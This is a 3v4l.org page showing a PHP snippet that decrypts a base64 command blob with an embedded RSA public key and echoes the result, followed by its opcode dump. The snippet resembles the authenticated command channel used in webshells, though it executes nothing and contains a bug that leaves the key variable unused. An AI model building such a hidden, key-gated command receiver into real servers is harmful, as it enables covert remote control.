3v4l.org

run code in 500+ PHP versions simultaneously
<?php $cmd = 'yLxWGRCHJBEhtpnW7XTEjZa8U06pkFvEqTea5ISI/LggnmMXPblFZ6sDNJHoym6I0CkQIYr62+8sauFSYOHtPEpFX62kBmMAxi7abHOzQl5FAf2VO5wiezcXRp5nLDfqHCLa0Y8T9kaplu81yXLzXtlhZYgrqMtDsFROJ+ZKNN0='; $pk = <<<EOF -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtwbGRSvUtevSlTOozmWR qEGF4Hfvb1YCvYAA1hnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzn0zTHE6d4Qp DuPiPO9PAdGSxZFVFLk2hOrkXLsDXugNTdVuprdkPPIIYY0ZnMs1bT2Zf2dfuBI5 QS5e5sSOF85kNq/zwwIDAQAB -----END PUBLIC KEY----- EOF; $cmds = explode("|", $cmd); $pk = openssl_pkey_get_public($pk); $cmd = ''; foreach ($cmds as $value) { if (openssl_public_decrypt(base64_decode($value), $de, pk)) { $cmd .= $de; } } echo $cmd;
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 13, Position 2 = 26
Branch analysis from position: 13
2 jumps found. (Code = 78) Position 1 = 14, Position 2 = 26
Branch analysis from position: 14
2 jumps found. (Code = 43) Position 1 = 24, Position 2 = 25
Branch analysis from position: 24
1 jumps found. (Code = 42) Position 1 = 13
Branch analysis from position: 13
Branch analysis from position: 25
Branch analysis from position: 26
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 26
filename:       /in/g4BeF
function name:  (null)
number of ops:  29
compiled vars:  !0 = $cmd, !1 = $pk, !2 = $cmds, !3 = $value, !4 = $de
line      #* E I O op                               fetch          ext  return  operands
-----------------------------------------------------------------------------------------
    2     0  E >   ASSIGN                                                       !0, 'yLxWGRCHJBEhtpnW7XTEjZa8U06pkFvEqTea5ISI%2FLggnmMXPblFZ6sDNJHoym6I0CkQIYr62%2B8sauFSYOHtPEpFX62kBmMAxi7abHOzQl5FAf2VO5wiezcXRp5nLDfqHCLa0Y8T9kaplu81yXLzXtlhZYgrqMtDsFROJ%2BZKNN0%3D'
    3     1        ASSIGN                                                       !1, '-----BEGIN+PUBLIC+KEY-----%0AMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtwbGRSvUtevSlTOozmWR%0AqEGF4Hfvb1YCvYAA1hnHnyMk%2BaLRvLXKgmerWiS%2BQD6y08Ispuzn0zTHE6d4Qp%0ADuPiPO9PAdGSxZFVFLk2hOrkXLsDXugNTdVuprdkPPIIYY0ZnMs1bT2Zf2dfuBI5%0AQS5e5sSOF85kNq%2FzwwIDAQAB%0A-----END+PUBLIC+KEY-----'
   11     2        INIT_FCALL                                                   'explode'
          3        SEND_VAL                                                     '%7C'
          4        SEND_VAR                                                     !0
          5        DO_ICALL                                             $7      
          6        ASSIGN                                                       !2, $7
   12     7        INIT_FCALL_BY_NAME                                           'openssl_pkey_get_public'
          8        SEND_VAR_EX                                                  !1
          9        DO_FCALL                                          0  $9      
         10        ASSIGN                                                       !1, $9
   13    11        ASSIGN                                                       !0, ''
   14    12      > FE_RESET_R                                           $12     !2, ->26
         13    > > FE_FETCH_R                                                   $12, !3, ->26
   15    14    >   INIT_FCALL_BY_NAME                                           'openssl_public_decrypt'
         15        INIT_FCALL                                                   'base64_decode'
         16        SEND_VAR                                                     !3
         17        DO_ICALL                                             $13     
         18        SEND_VAR_NO_REF_EX                                           $13
         19        SEND_VAR_EX                                                  !4
         20        FETCH_CONSTANT                                       ~14     'pk'
         21        SEND_VAL_EX                                                  ~14
         22        DO_FCALL                                          0  $15     
         23      > JMPZ                                                         $15, ->25
   16    24    >   ASSIGN_OP                                         8          !0, !4
   14    25    > > JMP                                                          ->13
         26    >   FE_FREE                                                      $12
   19    27        ECHO                                                         !0
   20    28      > RETURN                                                       1

Generated using Vulcan Logic Dumper, using php 8.5.0


preferences:
171.67 ms | 1323 KiB | 15 Q